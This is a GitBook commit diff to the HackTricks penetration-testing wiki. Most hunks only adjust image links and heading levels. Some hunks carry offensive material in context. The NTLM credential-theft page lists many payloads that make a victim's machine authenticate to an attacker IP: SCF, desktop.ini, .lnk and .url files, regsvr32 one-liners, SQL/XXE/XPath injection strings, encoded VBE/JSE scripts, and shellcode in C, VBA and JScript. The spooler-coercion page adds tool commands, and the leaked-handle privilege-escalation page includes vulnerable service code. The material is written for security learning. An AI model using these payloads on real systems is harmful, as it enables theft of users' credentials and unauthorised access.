GitBook: [#3314] No subject

This commit is contained in:
CPol 2022-07-11 08:44:04 +00:00 committed by gitbook-bot
parent 1a05533f33
commit ef4f36a477
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
33 changed files with 125 additions and 140 deletions

Binary file not shown.

After

Width:  |  Height:  |  Size: 509 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 509 KiB

After

Width:  |  Height:  |  Size: 96 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 27 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 27 KiB

After

Width:  |  Height:  |  Size: 102 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 68 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 68 KiB

After

Width:  |  Height:  |  Size: 102 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 102 KiB

After

Width:  |  Height:  |  Size: 73 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 73 KiB

After

Width:  |  Height:  |  Size: 261 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 261 KiB

After

Width:  |  Height:  |  Size: 13 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 17 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 17 KiB

After

Width:  |  Height:  |  Size: 88 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 88 KiB

After

Width:  |  Height:  |  Size: 3.6 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 3.6 KiB

After

Width:  |  Height:  |  Size: 28 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 28 KiB

After

Width:  |  Height:  |  Size: 99 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 8.4 KiB

After

Width:  |  Height:  |  Size: 9.8 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 9.8 KiB

After

Width:  |  Height:  |  Size: 120 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 170 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 170 KiB

After

Width:  |  Height:  |  Size: 686 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 686 KiB

After

Width:  |  Height:  |  Size: 55 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 55 KiB

After

Width:  |  Height:  |  Size: 18 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 256 KiB

Binary file not shown.

Before

Width:  |  Height:  |  Size: 256 KiB

After

Width:  |  Height:  |  Size: 151 KiB

View file

@ -118,7 +118,7 @@ If you want more details about the networking topics introduced here, go to the
Generally speaking, **pod-to-pod networking inside the node** is available via a **bridge** that connects all pods. This bridge is called “**cbr0**”. (Some network plugins will install their own bridge.) The **cbr0 can also handle ARP** (Address Resolution Protocol) resolution. When an incoming packet arrives at cbr0, it can resolve the destination MAC address using ARP.
![](<../../.gitbook/assets/image (637).png>)
![](<../../.gitbook/assets/image (637) (1).png>)
This fact implies that, by default, **every pod running in the same node** is going to be able to **communicate** with any other pod in the same node (independently of the namespace) at ethernet level (layer 2).

View file

@ -141,7 +141,7 @@ A rule/signature consists of the following:
* The **header**, defining the protocol, IP addresses, ports and direction of the rule.
* The **rule options**, defining the specifics of the rule.
![](<../../../.gitbook/assets/image (642).png>)
![](<../../../.gitbook/assets/image (642) (3).png>)
#### **Valid actions are**

View file

@ -96,7 +96,7 @@ vi modules/pam_unix/pam_unix_auth.c
Lets change this by:
![](<../../.gitbook/assets/image (638).png>)
![](<../../.gitbook/assets/image (638) (2).png>)
This will allow any user using the **password "0xMitsurugi"** to log in.

View file

@ -34,7 +34,7 @@ Electron has 2 process types:
* Main Process (has complete access to NodeJS)
* Renderer Process (should have NodeJS restricted access for security reasons)
![](<../../../.gitbook/assets/image (307).png>)
![](<../../../.gitbook/assets/image (307) (5).png>)
A **renderer process** will be a browser window loading a file:
@ -199,7 +199,7 @@ The desktop application **overrides these listeners** to implement the desktop a
**Here is a simplified pseudocode:**
![](<../../../.gitbook/assets/image (638) (2) (1).png>)
![](<../../../.gitbook/assets/image (638) (2) (1) (1).png>)
![](<../../../.gitbook/assets/image (620).png>)

View file

@ -351,7 +351,7 @@ When the browser finds that the **domain isn't responding** to him, it will **us
Note that in order to access localhost you should try to rebind 127.0.0.1 in Windows and 0.0.0.0 in linux.\
Providers such as godaddy or cloudflare didn't allow me to use the ip 0.0.0.0, but AWS route53 allowed me to create one A record with 2 IPs being one of them "0.0.0.0"
<img src="../.gitbook/assets/image (638) (2) (1) (1).png" alt="" data-size="original">
<img src="../.gitbook/assets/image (638) (2) (1) (1) (1).png" alt="" data-size="original">
{% endhint %}
![](<../.gitbook/assets/image (620) (4).png>)

View file

@ -100,7 +100,7 @@ In case `trustURLCodebase` is `true`, an attacker can provide his own classes in
It's easier to attack this LDAP using **JavaFactory references**:
![](<../../.gitbook/assets/image (660) (1).png>)
![](<../../.gitbook/assets/image (660) (1) (1).png>)
## Log4Shell Vulnerability

View file

@ -158,7 +158,7 @@ etcdctl --endpoints=http://<MASTER-IP>:2379 get / --prefix --keys-only
The [**Kubelet documentation**](https://kubernetes.io/docs/reference/command-line-tools-reference/kubelet/) explains that by **default anonymous acce**ss to the service is **allowed:**
![](<../../.gitbook/assets/image (637) (1) (1).png>)
![](<../../.gitbook/assets/image (637) (1) (1) (1).png>)
The **Kubelet** service **API is not documented**, but the source code can be found here and finding the exposed endpoints is as easy as **running**:

View file

@ -56,7 +56,7 @@ With [**SigDigger** ](https://github.com/BatchDrake/SigDigger)synchronize with t
* When a device is sending bursts of information, usually the **first part is going to be a preamble** so you **don't** need to **worry** if you **don't find information** in there **or if there are some errors** there.
* In frames of information you usually should **find different frames well aligned between them**:
![](<../../.gitbook/assets/image (660).png>)
![](<../../.gitbook/assets/image (660) (1).png>)
![](<../../.gitbook/assets/image (652) (1) (1).png>)
@ -101,7 +101,7 @@ You can **select the whole signal** where information is located, select **Ampli
For example, if you select Frequency instead of Amplitude in this AM signal you find just 1 frequency (no way information modulated in frequency is just using 1 freq).
![](<../../.gitbook/assets/image (637) (1).png>)
![](<../../.gitbook/assets/image (637) (1) (1).png>)
If you find a lot of frequencies potentially this won't be a FM, probably the signal frequency was just modified because of the channel.

View file

@ -1,4 +1,4 @@
# Force NTLM Privileged Authentication
<details>
@ -16,13 +16,12 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
# Spooler Service Abuse
## Spooler Service Abuse
If the _**Print Spooler**_ service is **enabled,** you can use some already known AD credentials to **request** to the Domain Controllers print server an **update** on new print jobs and just tell it to **send the notification to some system**.\
Note when printer send the notification to an arbitrary systems, it needs to **authenticate against** that **system**. Therefore, an attacker can make the _**Print Spooler**_ service authenticate against an arbitrary system, and the service will **use the computer account** in this authentication.
## Finding Windows Servers on the domain
### Finding Windows Servers on the domain
Using PowerShell, get a list of Windows boxes. Servers are usually priority, so lets focus there:
@ -30,7 +29,7 @@ Using PowerShell, get a list of Windows boxes. Servers are usually priority, so
Get-ADComputer -Filter {(OperatingSystem -like "*windows*server*") -and (OperatingSystem -notlike "2016") -and (Enabled -eq "True")} -Properties * | select Name | ft -HideTableHeaders > servers.txt
```
## Finding Spooler services listening
### Finding Spooler services listening
Using a slightly modified @mysmartlogin's (Vincent Le Toux's) [SpoolerScanner](https://github.com/NotMedic/NetNTLMtoSilverTicket), see if the Spooler Service is listening:
@ -45,7 +44,7 @@ You can also use rpcdump.py on Linux and look for the MS-RPRN Protocol
rpcdump.py DOMAIN/USER:PASSWORD@SERVER.DOMAIN.COM | grep MS-RPRN
```
## Ask the service to authenticate against an arbitrary host
### Ask the service to authenticate against an arbitrary host
You can compile[ **SpoolSample from here**](https://github.com/NotMedic/NetNTLMtoSilverTicket)**.**
@ -53,33 +52,36 @@ You can compile[ **SpoolSample from here**](https://github.com/NotMedic/NetNTLMt
SpoolSample.exe <TARGET> <RESPONDERIP>
```
or use [**3xocyte's dementor.py**](https://github.com/NotMedic/NetNTLMtoSilverTicket) or [**printerbug.py**](https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py) if you're on Linux
or use [**3xocyte's dementor.py**](https://github.com/NotMedic/NetNTLMtoSilverTicket) or [**printerbug.py**](https://github.com/dirkjanm/krbrelayx/blob/master/printerbug.py) if you're on Linux
```bash
python dementor.py -d domain -u username -p password <RESPONDERIP> <TARGET>
printerbug.py 'domain/username:password'@<Printer IP> <RESPONDERIP>
```
## Combining with Unconstrained Delegation
### Combining with Unconstrained Delegation
If an attacker has already compromised a computer with [Unconstrained Delegation](unconstrained-delegation.md), the attacker could **make the printer authenticate against this computer**. Due to the unconstrained delegation, the **TGT** of the **computer account of the printer** will be **saved in** the **memory** of the computer with unconstrained delegation. As the attacker has already compromised this host, he will be able to **retrieve this ticket** and abuse it ([Pass the Ticket](pass-the-ticket.md)).
# Inside Windows
## RCP Force authentication
{% embed url="https://github.com/p0dalirius/Coercer" %}
## Inside Windows
If you are already inside the Windows machine you can force Windows to connect to a server using privileged accounts with:
## Defender MpCmdRun
### Defender MpCmdRun
```bash
C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\MpCmdRun.exe -Scan -ScanType 3 -File \\<YOUR IP>\file.txt
```
# Cracking NTLMv1
## Cracking NTLMv1
If you can capture [NTLMv1 challenges read here how to crack them](../ntlm/#ntlmv1-attack).\
_Remember that in order to crack NTLMv1 you need to set Responder challenge to "1122334455667788"_
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
@ -95,5 +97,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>

View file

@ -1,4 +1,4 @@
# Places to steal NTLM creds
<details>
@ -16,46 +16,45 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
## Automatic Payloads Creation & Other lists
# Automatic Payloads Creation & Other lists
## [ntlm\_theft](https://github.com/Greenwolf/ntlm_theft)
### [ntlm\_theft](https://github.com/Greenwolf/ntlm\_theft)
This tool will **create several documents/files** that if accessed by the user somehow they will **start a NTLM authentication with the attacker**.
### ntlm\_theft supports the following attack types:
#### ntlm\_theft supports the following attack types:
Browse to Folder Containing:
* .url via URL field
* .url via ICONFILE field
* .lnk - via icon\_location field
* .scf via ICONFILE field \(Not Working on Latest Windows\)
* autorun.inf via OPEN field \(Not Working on Latest Windows\)
* desktop.ini - via IconResource field \(Not Working on Latest Windows\)
* .scf via ICONFILE field (Not Working on Latest Windows)
* autorun.inf via OPEN field (Not Working on Latest Windows)
* desktop.ini - via IconResource field (Not Working on Latest Windows)
Open Document:
* .xml via Microsoft Word external stylesheet
* .xml via Microsoft Word includepicture field
* .htm via Chrome & IE & Edge img src \(only if opened locally, not hosted\)
* .docx via Microsoft Word includepicture field
* .htm via Chrome & IE & Edge img src (only if opened locally, not hosted)
* .docx via Microsoft Word includepicture field
-.docx via Microsoft Word external template
\-.docx via Microsoft Word external template
-.docx via Microsoft Word frameset webSettings
\-.docx via Microsoft Word frameset webSettings
-.xlsx - via Microsoft Excel external cell
\-.xlsx - via Microsoft Excel external cell
-.wax - via Windows Media Player playlist \(Better, primary open\)
\-.wax - via Windows Media Player playlist (Better, primary open)
-.asx via Windows Media Player playlist \(Better, primary open\)
\-.asx via Windows Media Player playlist (Better, primary open)
-.m3u via Windows Media Player playlist \(Worse, Win10 opens first in Groovy\)
\-.m3u via Windows Media Player playlist (Worse, Win10 opens first in Groovy)
-.jnlp via Java external jar
\-.jnlp via Java external jar
-.application via any Browser \(Must be served via a browser downloaded or wont run\)
\-.application via any Browser (Must be served via a browser downloaded or wont run)
Open Document and Accept Popup:
@ -88,29 +87,31 @@ Click Link in Chat Program:
> Generation Complete.
> ```
## [All\_NTLM-Leak](https://github.com/Gl3bGl4z/All_NTLM_leak)
### [All\_NTLM-Leak](https://github.com/Gl3bGl4z/All\_NTLM\_leak)
> Cheatsheet
This is a list of techniques to force NTLM authentications to steal credentials from the victim.
## Force NTLM Privileged Authentication
### Force NTLM Privileged Authentication
You may be able to **force a windows machine to authenticate to an arbitrary machine** using a privileged account. Read the following page to learn more:
{% page-ref page="../active-directory-methodology/printers-spooler-service-abuse.md" %}
{% content-ref url="../active-directory-methodology/printers-spooler-service-abuse.md" %}
[printers-spooler-service-abuse.md](../active-directory-methodology/printers-spooler-service-abuse.md)
{% endcontent-ref %}
# LFI
## LFI
The include\(\) in PHP will resolve the network path for us.
The include() in PHP will resolve the network path for us.
```text
```
http://host.tld/?page=//11.22.33.44/@OsandaMalith
```
![](https://osandamalith.files.wordpress.com/2017/03/lfi.png?w=640)
![](<../../.gitbook/assets/image (642).png>)
# XXE
## XXE
In here Im using “php://filter/convert.base64-encode/resource=” that will resolve a network path.
@ -126,51 +127,49 @@ In here Im using “php://filter/convert.base64-encode/resource=” that will
</root>
```
![](https://osandamalith.files.wordpress.com/2017/03/xxe.png?w=640)
![](<../../.gitbook/assets/image (618).png>)
# XPath Injection
## XPath Injection
Usually, doc\(\) is used in out-of-band XPath injections, thus can be applied in resolving a network path.
Usually, doc() is used in out-of-band XPath injections, thus can be applied in resolving a network path.
```text
```
http://host.tld/?title=Foundation&type=*&rent_days=* and doc('//35.164.153.224/@OsandaMalith')
```
![](https://osandamalith.files.wordpress.com/2017/03/xpath.png?w=640)
![](<../../.gitbook/assets/image (638).png>)
# MySQL Injection
## MySQL Injection
I have written a complete [post ](https://osandamalith.com/2017/02/03/mysql-out-of-band-hacking/)on MySQL out-of-band injections which can be applied over the internet. You can also use INTO OUTFILE to resolve a network path.
```text
```
http://host.tld/index.php?id=1 union select 1,2,load_file(\\\\192.168.0.100\\@OsandaMalith),4;%00
```
![](https://osandamalith.files.wordpress.com/2017/02/overinternet.png?w=640)
![](<../../.gitbook/assets/image (663).png>)
# MSSQL
## MSSQL
Since stacked queries are supported we can call stored procedures.
```text
```
';declare @q varchar(99);set @q='\\192.168.254.52\test'; exec master.dbo.xp_dirtree @q
```
# Regsvr32
## Regsvr32
Accidently found this one while experimenting with .sct files.
```text
```
regsvr32 /s /u /i://35.164.153.224/@OsandaMalith scrobj.dll
```
![](https://osandamalith.files.wordpress.com/2017/03/regsvr32.png?w=640)
# Batch
## Batch
There are many possible ways you can explore
```text
```
echo 1 > //192.168.0.1/abc
pushd \\192.168.0.1\abc
cmd /k \\192.168.0.1\abc
@ -182,32 +181,30 @@ dir\\192.168.0.1\abc
find, findstr, [x]copy, move, replace, del, rename and many more!
```
![](https://osandamalith.files.wordpress.com/2017/03/batch.png?w=640)
# Auto-Complete
## Auto-Complete
You just need to type \host\ the auto-complete will do the trick under the explorer and the run dialog box.
![](https://osandamalith.files.wordpress.com/2017/03/explorer.png?w=640)
![](<../../.gitbook/assets/image (660).png>)
![](https://osandamalith.files.wordpress.com/2017/03/run.png?w=640)
![](<../../.gitbook/assets/image (637).png>)
# Autorun.inf
## Autorun.inf
Starting from Windows 7 this feature is disabled. However you can enable by changing the group policy for Autorun. Make sure to hide the Autorun.inf file to work.
```text
```
[autorun]
open=\\35.164.153.224\setup.exe
icon=something.ico
action=open Setup.exe
```
# Shell Command Files
## Shell Command Files
It is possible to obtain passwords hashes of domain users or shells when writing permissions given to unauthenticated users. SCF \(Shell Command Files\) can perform a limited set of operations like showing the Windows desktop or opening a Windows Explorer. Save the code below as `ordinary.scf` and put it into a network share.
It is possible to obtain passwords hashes of domain users or shells when writing permissions given to unauthenticated users. SCF (Shell Command Files) can perform a limited set of operations like showing the Windows desktop or opening a Windows Explorer. Save the code below as `ordinary.scf` and put it into a network share.
```text
```
[Shell]
Command=2
IconFile=\\AttackerIP\ordinary.ico
@ -215,11 +212,11 @@ IconFile=\\AttackerIP\ordinary.ico
Command=ToggleDesktop
```
# Desktop.ini
## Desktop.ini
The desktop.ini files contain the information of the icons you have applied to the folder. We can abuse this to resolve a network path. Once you open the folder you should get the hashes.
```text
```
mkdir openMe
attrib +s openMe
cd openMe
@ -230,17 +227,17 @@ attrib +s +h desktop.ini
In Windows XP systems the desktop.ini file uses IcondFile instead of IconResource.
```text
```
[.ShellClassInfo]
IconFile=\\192.168.0.1\aa
IconIndex=1337
```
# Shortcut Files \(.lnk\)
## Shortcut Files (.lnk)
We can create a shortcut containing our network path and as you as you open the shortcut Windows will try to resolve the network path. You can also specify a keyboard shortcut to trigger the shortcut. For the icon you can give the name of a Windows binary or choose an icon from either shell32.dll, Ieframe.dll, imageres.dll, pnidui.dll or wmploc.dll located in the system32 directory.
```text
```
Set shl = CreateObject("WScript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")
currentFolder = shl.CurrentDirectory
@ -257,7 +254,7 @@ sc.Save
The Powershell version.
```text
```
$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("StealMyHashes.lnk")
$lnk.TargetPath = "\\35.164.153.224\@OsandaMalith"
@ -268,55 +265,53 @@ $lnk.HotKey = "Ctrl+Alt+O"
$lnk.Save()
```
![](https://osandamalith.files.wordpress.com/2017/03/shortcut2.png?w=640)
# Internet Shortcuts \(.url\)
## Internet Shortcuts (.url)
Another shortcut in Windows is the Internet shortcuts. You can save this as something.url
```text
```
echo [InternetShortcut] > stealMyHashes.url
echo URL=file://192.168.0.1/@OsandaMalith >> stealMyHashes.url
```
# Autorun with Registry
## Autorun with Registry
You can add a new registry key in any of the following paths.
```text
```
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce
```
![](https://osandamalith.files.wordpress.com/2017/03/registry.png?w=640)
![](<../../.gitbook/assets/image (307).png>)
# Powershell
## Powershell
There are probably many scriptlets in Powershell that would resolve a network path.
```text
```
Invoke-Item \\192.168.0.1\aa
Get-Content \\192.168.0.1\aa
Start-Process \\192.168.0.1\aa
```
# IE
## IE
IE will resolve UNC paths. For example
```text
```
<img src="\\\\192.168.0.1\\aa">
```
You can inject under XSS or in scenarios you find SQL injection. For example.
```text
```
http://host.tld/?id=-1' union select 1,'<img src="\\\\192.168.0.1\\aa">';%00
```
# VBScript
## VBScript
You can save this as .vbs or can be used inside a macro that is applied to Word or Excel files.
@ -340,13 +335,13 @@ Set file = fso.OpenTextFile("//192.168.0.100/aa", 1)
Here the encoded version. You can encode and save this as something.vbe
```text
```
#@~^ZQAAAA==jY~6?}'ZM2mO2}4%+1YcEUmDb2YbxocorV?H/O+h6(LnmDE#=?nO,sksn{0dWcGa+U:+XYsbVcJJzf*cF*cF*2 yczmCE~8#XSAAAA==^#~@
```
You can apply this in html files too. But only works with IE. You can save this as something.hta which will be an HTML Application under windows, which mshta.exe will execute it. By default it uses IE.
```text
```
<html>
<script type="text/Vbscript.Encode">
<!--
@ -356,7 +351,7 @@ You can apply this in html files too. But only works with IE. You can save this
</html>
```
# JScript
## JScript
You can save this as something.js under windows.
@ -380,7 +375,7 @@ fso.FileExists("//192.168.0.103/aa")
Heres the encoded version. You can save this as something.jse.
```text
```
#@~^XAAAAA==-mD~6/K'xh,)mDk-+or8%mYvE?1DkaOrxTRwks+jzkYn:}8LmOE*i0dGcsrV3XkdD/vJzJFO+R8v0RZRqT2zlmE#Ux4AAA==^#~@
```
@ -396,7 +391,7 @@ The html version of this.
</html>
```
# Windows Script Files
## Windows Script Files
Save this as something.wsf.
@ -411,11 +406,11 @@ Save this as something.wsf.
</package>
```
# Shellcode
## Shellcode
Heres a small shellcode I made. This shellcode uses CreateFile and tries to read a non-existing network path. You can use tools such as Responder to capture NetNTLM hashes. The shellcode can be modified to steal hashes over the internet. SMBRelay attacks can also be performed.
```text
```cpp
/*
Title: CreateFile Shellcode
Author: Osanda Malith Jayathissa (@OsandaMalith)
@ -474,13 +469,11 @@ int main() {
[https://packetstormsecurity.com/files/141707/CreateFile-Shellcode.html](https://packetstormsecurity.com/files/141707/CreateFile-Shellcode.html)
![](https://osandamalith.files.wordpress.com/2017/03/overintenert1.png?w=640)
# Shellcode Inside Macros
## Shellcode Inside Macros
Heres the above shellcode applied inside a Word/Excel macro. You can use the same code inside a VB6 application.
```text
```basic
' Author : Osanda Malith Jayathissa (@OsandaMalith)
' Title: Shellcode to request a non-existing network path
' Website: https://osandamalith
@ -576,16 +569,16 @@ End Sub
[https://github.com/OsandaMalith/Shellcodes/blob/master/CreateFile/CreateFile.vba](https://github.com/OsandaMalith/Shellcodes/blob/master/CreateFile/CreateFile.vba)
# Shellcode Inside VBS and JS
## Shellcode Inside VBS and JS
subTee has done many kinds of research with JS and DynamicWrapperX. You can find a POC using the DynamicWrapperX DLL.
[http://subt0x10.blogspot.com/2016/09/shellcode-via-jscript-vbscript.html](http://subt0x10.blogspot.com/2016/09/shellcode-via-jscript-vbscript.html)
Based on that I have ported the shellcode to JS and VBS. The fun part is we can embed shellcode in JScript or VBScript inside html and .hta formats.
subTee has done many kinds of research with JS and DynamicWrapperX. You can find a POC using the DynamicWrapperX DLL.\
[http://subt0x10.blogspot.com/2016/09/shellcode-via-jscript-vbscript.html](http://subt0x10.blogspot.com/2016/09/shellcode-via-jscript-vbscript.html)\
Based on that I have ported the shellcode to JS and VBS. The fun part is we can embed shellcode in JScript or VBScript inside html and .hta formats.\
Note the following shellcode directs to my IP.
### JScript
#### JScript
```text
```javascript
/*
* Author : Osanda Malith Jayathissa (@OsandaMalith)
* Title: Shellcode to request a non-existing network path
@ -629,9 +622,9 @@ var thread = DX.CreateThread(0,0,scLocation,0,0);
[https://github.com/OsandaMalith/Shellcodes/blob/master/CreateFile/CreateFile.js](https://github.com/OsandaMalith/Shellcodes/blob/master/CreateFile/CreateFile.js)
### VBScript
#### VBScript
```text
```vba
' Author : Osanda Malith Jayathissa (@OsandaMalith)
' Title: Shellcode to request a non-existing network path
' Website: https://osandamalith.com
@ -680,13 +673,11 @@ thread = DX.CreateThread (0,0,scLocation,0,0)
There might be many other ways in Windows. You never know! 🙂
# References
## References
* [**https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/**](https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/)
* [https://attack.mitre.org/techniques/T1187/](https://attack.mitre.org/techniques/T1187/)
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
@ -702,5 +693,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>

View file

@ -1,4 +1,4 @@
# Leaked Handle Exploitation
<details>
@ -16,21 +16,20 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details>
# Introduction
## Introduction
Handles in a process allow to **access** different **Windows resources**:
![](<../../.gitbook/assets/image (663).png>)
![](<../../.gitbook/assets/image (663) (1).png>)
There have been already several **privilege escalation** cases where a **privileged process** with **open and inheritable handles** have **run** an **unprivileged process** giving it **access to all those handles**.
For example, imagine that **a process running as SYSTEM open a new process** (`OpenProcess()`) with **full access**. The same process **also creates a new process** (`CreateProcess()`) **with low privileges but inheriting all the open handles of the main process**.\
Then, if you have **full access to the low privileged process**, you can grab the **open handle to the privileged process created** with `OpenProcess()` and **inject a shellcode**.
# **Interesting Handles**
## **Interesting Handles**
## **Process**
### **Process**
As you read on the initial example if an **unprivileged process inherits a process handle** of a **privileged process** with enough permissions it will be able to execute **arbitrary code on it**.
@ -42,7 +41,7 @@ In [**this excellent article**](http://dronesec.pw/blog/2019/08/22/exploiting-le
* PROCESS\_DUP\_HANDLE
* PROCESS\_VM\_WRITE
## Thread
### Thread
Similar to the process handles, if an **unprivileged process inherits a thread handle** of a **privileged process** with enough permissions it will be able to execute **arbitrary code on it**.
@ -52,15 +51,15 @@ In [**this excellent article**](http://dronesec.pw/blog/2019/08/22/exploiting-le
* THREAD\_DIRECT\_IMPERSONATION
* THREAD\_SET\_CONTEXT
## File, Key & Section Handles
### File, Key & Section Handles
If an **unprivileged process inherits** a **handle** with **write** equivalent **permissions** over a **privileged file or registry**, it will be able to **overwrite** the file/registry (and with a lot of **luck**, **escalate privileged**).
**Section Handles** are similar to file handles, the common name of this kinds of [objects is **"File Mapping"**](https://docs.microsoft.com/en-us/windows/win32/memory/file-mapping). They are used to work with **big files without keeping the entire** file in memory. That makes the exploitation kind of "similar" to the exploitation of a File Handle.
# How to see handles of processes
## How to see handles of processes
## Process Hacker
### Process Hacker
[**Process Hacker**](https://github.com/processhacker/processhacker) is a tool you can download for free. It has several amazing options to inspect processes and one of them is the **capability to see the handles of each process**.
@ -74,17 +73,17 @@ You can then right click on the handle and **check the permissions**:
![](<../../.gitbook/assets/image (628).png>)
## Sysinternals Handles
### Sysinternals Handles
The [**Handles** ](https://docs.microsoft.com/en-us/sysinternals/downloads/handle)binary from Sysinternals will also list the handles per process in the console:
![](<../../.gitbook/assets/image (654).png>)
## LeakedHandlesFinder
### LeakedHandlesFinder
[**This tool**](https://github.com/lab52io/LeakedHandlesFinder) allows you to **monitor** leaked **handles** and even **autoexploit** them to escalate privileges.
## Methodology
### Methodology
Now that you know how to find handles of processes what you need to check is if any **unprivileged process is having access to privileged handles**. In that case, the user of the process could be able to obtain the handle and abuse it to escalate privileges.
@ -96,7 +95,7 @@ handle64.exe /a | findstr /r /i "process thread file key pid:"
```
{% endhint %}
# Vulnerable Example
## Vulnerable Example
For example, the following code belongs to a **Windows service** that would be vulnerable. The vulnerable code of this service binary is located inside the **`Exploit`** function. This function is starts **creating a new handle process with full access**. Then, it's **creating a low privileged process** (by copying the low privileged token of _explorer.exe_) executing _C:\users\username\desktop\client.exe_. The **vulnerability resides in the fact it's creating the low privileged process with `bInheritHandles` as `TRUE`**.
@ -308,7 +307,7 @@ int _tmain( int argc, TCHAR* argv[] )
}
```
## Exploit Example 1
### Exploit Example 1
{% hint style="info" %}
In a real scenario you probably **won't be able to control the binary** that is going to be executed by the vulnerable code (_C:\users\username\desktop\client.exe_ in this case). Probably you will **compromise a process and you will need to look if you can access any vulnerable handle of any privileged process**.
@ -521,7 +520,7 @@ int main(int argc, char **argv) {
}
```
## Exploit Example 2
### Exploit Example 2
{% hint style="info" %}
In a real scenario you probably **won't be able to control the binary** that is going to be executed by the vulnerable code (_C:\users\username\desktop\client.exe_ in this case). Probably you will **compromise a process and you will need to look if you can access any vulnerable handle of any privileged process**.
@ -692,7 +691,7 @@ int main(int argc, char **argv) {
}
```
# Other tools and examples
## Other tools and examples
* [**https://github.com/lab52io/LeakedHandlesFinder**](https://github.com/lab52io/LeakedHandlesFinder)
@ -702,13 +701,12 @@ This tool allows you to monitor leaked handles to find vulnerable ones and even
Another tool to leak a handle and exploit it.
# References
## References
* [http://dronesec.pw/blog/2019/08/22/exploiting-leaked-process-and-thread-handles/](http://dronesec.pw/blog/2019/08/22/exploiting-leaked-process-and-thread-handles/)
* [https://github.com/lab52io/LeakedHandlesFinder](https://github.com/lab52io/LeakedHandlesFinder)
* [https://googleprojectzero.blogspot.com/2016/03/exploiting-leaked-thread-handle.html](https://googleprojectzero.blogspot.com/2016/03/exploiting-leaked-thread-handle.html)
<details>
<summary><strong>Support HackTricks and get benefits!</strong></summary>
@ -724,5 +722,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
</details>